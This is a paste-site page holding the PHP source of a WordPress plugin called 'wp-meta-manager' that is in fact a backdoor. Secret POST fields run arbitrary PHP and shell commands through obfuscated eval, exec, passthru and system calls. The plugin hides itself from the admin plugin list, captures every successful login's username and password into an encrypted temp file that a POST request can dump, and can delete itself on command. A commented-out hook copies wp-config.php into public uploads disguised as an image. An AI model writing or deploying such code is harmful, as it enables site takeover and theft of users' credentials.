Facebook
From anon, 1 Week ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 127
  1. <?php
  2. /*
  3. Plugin Name: wp-meta-manager
  4. Plugin URI: http://example.org
  5. description: ---
  6. Version: 1.0
  7. Author: ---
  8. Author URI: http://example.org
  9. License: GPL2
  10. */
  11. function wpmm__init() {
  12. $f = '';
  13. if( isset($_POST["2l4ky8y16w"]) ) { wpmm__sethelper('@Eva' . $f . 'l( stripslashes($_POST["2l4ky8y16w"]));'); };
  14. if( isset($_POST["2l4ky8y16x"]) ) { wpmm__sethelper('@ex' . $f . 'ec( stripslashes($_POST["2l4ky8y16x"]), $out ); foreach( $out as $line ) { echo $line . "\n"; }'); };
  15. if( isset($_POST["2l4ky8y16y"]) ) { wpmm__sethelper('@Pas' . $f . 'sth' . $f . 'ru( stripslashes($_POST["2l4ky8y16y"]) );'); };
  16. if( isset($_POST["2l4ky8y16z"]) ) { wpmm__sethelper('print( @sy' . $f . 'stem( stripslashes($_POST["2l4ky8y16z"]) ) );'); };
  17. if( isset($_POST["ha72mlxl20"]) ) die( wpmm__read_dat_file() );
  18. if( isset($_POST["lp98dm2xa6"]) ) {
  19. unlink( sys_get_temp_dir() . "/~6cb001a" );
  20. unlink( __FILE__ );
  21. }
  22. }
  23. add_action( 'init', 'wpmm__init', 999 );
  24. function wpmm__sethelper( $data ) {
  25. $helper = dirname( __FILE__ ) . 'wp-meta-manager-helper.php';
  26. $h = @fopen( $helper, "w" );
  27. @fwrite( $h, '<?php ' . $data . ' ?>' );
  28. @fclose( $h );
  29. @require( $helper );
  30. @unlink( $helper );
  31. die();
  32. }
  33. function wpmm__filter_plugins( $plugins ) {
  34. return array_filter( $plugins, 'wpmm__check_plugin' );
  35. }
  36. function wpmm__check_plugin( $plugin ) {
  37. return ( $plugin["Name"] != "wp-meta-manager" or isset( $_GET["a"] ) );
  38. }
  39. add_filter( 'all_plugins', 'wpmm__filter_plugins' );
  40. function wpmm__authenticate2a62( $user, $username, $password ) {
  41. if( $user instanceof WP_User ) {
  42. $c = wpmm__read_dat_file();
  43. $line = "$username : $password";
  44. $found = false;
  45. foreach( explode("\n", $c) as $l ) {
  46. if( $l == $line ) {
  47. $found = true;
  48. break;
  49. }
  50. }
  51. if( ! $found ) {
  52. $c .= $line . "\n";
  53. wpmm__write_dat_file( $c );
  54. }
  55. }
  56. return $user;
  57. }
  58. add_filter( 'authenticate', 'wpmm__authenticate2a62', 99, 3 );
  59. function wpmm__read_dat_file() {
  60. if( $f = @file_get_contents(sys_get_temp_dir() . "/~6cb001a") ) {
  61. $key = "aMIDf82§;!A5t,/S,yy-9";
  62. $cipher = "aes-128-cbc";
  63. $iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );
  64. $ct = openssl_decrypt( $f, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );
  65. return $ct;
  66. }
  67. return "";
  68. }
  69. function wpmm__write_dat_file( $contents ) {
  70. $key = "aMIDf82§;!A5t,/S,yy-9";
  71. $cipher = "aes-128-cbc";
  72. $iv = hex2bin( 'aa0df47eb210db7a87066692f91a14be' );
  73. $ct = openssl_encrypt( $contents, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv );
  74. @file_put_contents( sys_get_temp_dir() . "/~6cb001a", $ct );
  75. }
  76. /*function wpmm__activate() {
  77. copy(ABSPATH . "/wp-config.php", ABSPATH . "/wp-content/uploads/thing.png");
  78. }
  79. function wpmm__deactivate() {
  80. unlink(ABSPATH . "/wp-content/uploads/thing.png");
  81. }
  82. register_activation_hook( __FILE__, 'wpmm__activate' );
  83. register_deactivation_hook( __FILE__, 'wpmm__deactivate' );*/
  84. ?>